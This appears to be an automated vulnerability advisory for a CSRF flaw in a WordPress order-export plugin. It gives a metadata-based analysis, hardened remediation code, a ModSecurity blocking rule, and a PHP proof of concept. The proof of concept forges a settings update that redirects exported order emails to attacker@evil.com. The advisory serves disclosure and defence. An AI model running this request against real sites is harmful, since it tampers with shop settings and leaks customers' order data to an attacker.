Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 24, 2026

CVE-2026-4140: Ni WooCommerce Order Export <= 3.1.6 – Cross-Site Request Forgery to Settings Update via ni_order_export_action AJAX Action (ni-woocommerce-order-export)

CVE ID: CVE-2026-4140
Severity: Medium (CVSS 4.3)
CWE: CWE-352
Vulnerable Version: <= 3.1.6
Patched Version: (none available)
Disclosed: April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4140 (metadata-based):
The Ni WooCommerce Order Export plugin for WordPress, up to and including version 3.1.6, contains a Cross-Site Request Forgery (CSRF) vulnerability. The flaw resides in the AJAX handler function ni_order_export_action(), which processes settings updates without verifying a nonce or checking user capabilities. This allows an attacker to trick a site administrator into executing a forged request that modifies plugin settings.

The root cause is a missing nonce check in the ni_order_export_action() AJAX handler. The description confirms that when the 'page' parameter is set to 'nioe-order-settings', the handler delegates to Ni_Order_Setting::page_ajax(), which calls update_option('ni_order_export_option', $_REQUEST) without any CSRF token validation. Atomic Edge analysis infers from the CWE-352 classification that the developer likely omitted the typical WordPress nonce field (often named '_wpnonce' or passed via the 'security' parameter) and the corresponding check using wp_verify_nonce() or check_ajax_referer(). Since no code diff is available, these conclusions are inferred from the CWE and description, not confirmed against source code.

Exploitation requires tricking an authenticated WordPress administrator into visiting a malicious link or page while logged in. The attacker crafts a request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'ni_order_export_action' and the 'page' parameter set to 'nioe-order-settings', along with arbitrary settings data in the request body. A simple HTML form can be hosted on an attacker-controlled site and auto-submitted via JavaScript to trigger the CSRF attack. The settings that can be modified include any options stored under the 'ni_order_export_option' key, which may control export formats, file paths, email recipients, or other plugin behaviors.

Remediation requires implementing a nonce check in the ni_order_export_action() AJAX handler. The plugin should generate a nonce when rendering settings pages and verify it using check_ajax_referer() or wp_verify_nonce() before processing any settings updates. Additionally, a capability check (e.g., current_user_can('manage_options')) should be added to ensure only administrators can modify settings. Because the handler stores $_REQUEST wholesale, the settings update should also accept only the fields the plugin owns and sanitize each one. Without a patched version available, sites should consider disabling or replacing the plugin.
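The following is an added example of what the remediation above looks like in code; it is not the plugin's own source (no diff is available for this CVE), and the function names prefixed nioe_example_ are illustrative. The action name, the 'page' value and the option key come from the advisory; the field names and the allow-list of export formats are constructed for the example. The vulnerable shape is shown as a comment beside the hardened handler.

```php
<?php
// Added example, not the plugin's code. Names with the nioe_example_ prefix are hypothetical;
// 'ni_order_export_action', 'nioe-order-settings' and 'ni_order_export_option' are from the advisory.

// --- BEFORE: the pattern the advisory describes (kept as a comment) ---------------------
// add_action( 'wp_ajax_ni_order_export_action', 'ni_order_export_action' );
// function ni_order_export_action() {
//     if ( isset( $_REQUEST['page'] ) && 'nioe-order-settings' === $_REQUEST['page'] ) {
//         update_option( 'ni_order_export_option', $_REQUEST ); // no nonce, no capability check
//     }
//     wp_die();
// }

// --- AFTER: nonce + capability + allow-listed, sanitized fields -------------------------

// 1. Where the settings page is rendered, embed a nonce bound to this action.
//    wp_nonce_field() is the WordPress API; the form fields are constructed for the example.
function nioe_example_render_settings_page() {
    echo '<form id="nioe-settings">';
    wp_nonce_field( 'ni_order_export_settings', 'security' ); // hidden input named "security"
    echo '<input type="text" name="export_format" value="csv">';
    echo '<input type="email" name="email_recipient" value="">';
    echo '<input type="checkbox" name="enable_logging" value="yes">';
    echo '</form>';
}

// 2. Accept only the fields the plugin owns; never persist $_REQUEST or $_POST as-is.
function nioe_example_sanitize_settings( array $input ) {
    $clean           = array();
    $allowed_formats = array( 'csv', 'xls' ); // constructed allow-list for the example

    $format                 = isset( $input['export_format'] )
        ? sanitize_text_field( wp_unslash( $input['export_format'] ) )
        : 'csv';
    $clean['export_format'] = in_array( $format, $allowed_formats, true ) ? $format : 'csv';

    $clean['email_recipient'] = isset( $input['email_recipient'] )
        ? sanitize_email( wp_unslash( $input['email_recipient'] ) )
        : '';

    $clean['enable_logging'] = ( isset( $input['enable_logging'] ) && 'yes' === $input['enable_logging'] )
        ? 'yes'
        : 'no';

    return $clean;
}

// 3. The handler: verify the nonce first, then the capability, then sanitize and store.
add_action( 'wp_ajax_ni_order_export_action', 'nioe_example_order_export_action' );
function nioe_example_order_export_action() {
    // check_ajax_referer() terminates the request (HTTP 403, body -1) when the nonce in the
    // 'security' parameter is missing or invalid. A cross-site form post cannot carry a valid
    // nonce because the attacker's page cannot read it, so this is the CSRF fix.
    check_ajax_referer( 'ni_order_export_settings', 'security' );

    // A nonce proves intent, not authority: still require the administrator capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Only the settings page may reach update_option(); read from $_POST, not $_REQUEST.
    $page = isset( $_POST['page'] ) ? sanitize_key( wp_unslash( $_POST['page'] ) ) : '';
    if ( 'nioe-order-settings' !== $page ) {
        wp_send_json_error( array( 'message' => 'Unknown settings page.' ), 400 );
    }

    update_option( 'ni_order_export_option', nioe_example_sanitize_settings( $_POST ) );
    wp_send_json_success( array( 'message' => 'Settings saved.' ) );
}
```

The order of the checks matters: the nonce check rejects forged cross-site requests before any capability or business logic runs, the capability check stops lower-privileged logged-in users who could otherwise obtain a nonce from a page they are allowed to view, and the allow-list keeps an attacker from smuggling unrelated keys into the option array even once both checks pass.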

Impact: An unauthenticated attacker can force a site administrator to unknowingly change plugin settings. Depending on the settings available, this could lead to redirection of exported data (e.g., changing email recipients), modification of export file structures, or disabling security-relevant features. The CVSS score of 4.3 (Medium) reflects limited impact: confidentiality is not affected, but integrity is compromised. There is no direct privilege escalation or remote code execution described, but altered settings could be leveraged in further attacks.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

# Atomic Edge WAF Rule - CVE-2026-4140 (metadata-based)
# This rule blocks CSRF exploitation of the Ni WooCommerce Order Export plugin by targeting the AJAX handler.
# The rule requires both the AJAX endpoint and the specific action/page parameters to be present.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20264140,phase:2,deny,status:403,chain,msg:'CVE-2026-4140 - Ni WooCommerce Order Export CSRF to Settings Update',severity:'CRITICAL',tag:'CVE-2026-4140',tag:'wordpress',tag:'ni-woocommerce-order-export'"
SecRule ARGS_POST:action "@streq ni_order_export_action" "chain"
SecRule ARGS_POST:page "@streq nioe-order-settings" ""

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4140 - Ni WooCommerce Order Export <= 3.1.6 - Cross-Site Request Forgery to Settings Update via ni_order_export_action AJAX Action

// This PoC demonstrates a CSRF attack that modifies plugin settings.
// Assumptions:
// 1. The target WordPress site has the vulnerable plugin installed and active.
// 2. An administrator is logged in when the crafted request is sent.
// 3. The plugin's settings are stored under the 'ni_order_export_option' option key.
// 4. The AJAX action is 'ni_order_export_action' and the settings page trigger is 'page=nioe-order-settings'.

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// Arbitrary settings payload to overwrite plugin options.
// In a real attack, these values would be crafted to achieve a specific objective.
$settings_payload = array(
    'page' => 'nioe-order-settings',
    'action' => 'ni_order_export_action',
    'ni_order_export_option' => array(
        'export_format' => 'csv',
        'email_recipient' => 'attacker@evil.com',
        'enable_logging' => 'no'
    )
);

// Initialize cURL session
$ch = curl_init();

// Set the target AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($settings_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie'); // Attacker must provide a valid admin session cookie or use CSRF phishing

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for success (HTTP 200 only means admin-ajax.php handled the request; it does not
// confirm that the option was written, since the handler's own response is not parsed here)
if ($response !== false && $http_code == 200) {
    echo "PoC: Settings update request sent successfully.\n";
    echo "If an administrator was tricked into performing this action, the settings have been modified.\n";
} else {
    echo "PoC: Request failed or was blocked.\n";
}

curl_close($ch);
?>
